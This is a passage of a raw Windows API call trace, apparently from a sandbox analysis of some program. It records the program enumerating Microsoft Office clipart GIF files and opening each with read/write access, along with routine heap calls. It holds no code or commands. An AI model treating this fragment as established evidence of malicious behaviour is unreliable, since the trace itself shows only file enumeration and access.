cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0100.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 69 [0100.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.416] GetFileType (hFile=0x27c) returned 0x1 [0100.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.416] CloseHandle (hObject=0x27c) returned 1 [0100.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.418] AreFileApisANSI () returned 1 [0100.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0100.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 69 [0100.418] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a1c)) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0100.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.418] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.418] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb58a9e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb58a9e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb3, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00038_.GIF", cAlternateFileName="")) returned 1 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0100.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0100.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0100.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.419] AreFileApisANSI () returned 1 [0100.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0100.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.419] AreFileApisANSI () returned 1 [0100.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0100.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 69 [0100.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.420] GetFileType (hFile=0x27c) returned 0x1 [0100.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.420] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.420] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.420] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.420] CloseHandle (hObject=0x27c) returned 1 [0100.420] AreFileApisANSI () returned 1 [0100.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0100.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 69 [0100.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.421] GetFileType (hFile=0x27c) returned 0x1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0100.421] CloseHandle (hObject=0x27c) returned 1 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.423] AreFileApisANSI () returned 1 [0100.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0100.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 69 [0100.423] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb58a9e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb58a9e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb3)) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0100.423] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.423] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.423] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb58a9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fa1, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00040_.GIF", cAlternateFileName="")) returned 1 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0100.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.424] AreFileApisANSI () returned 1 [0100.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF", lpUsedDefaultChar=0x0) returned 69 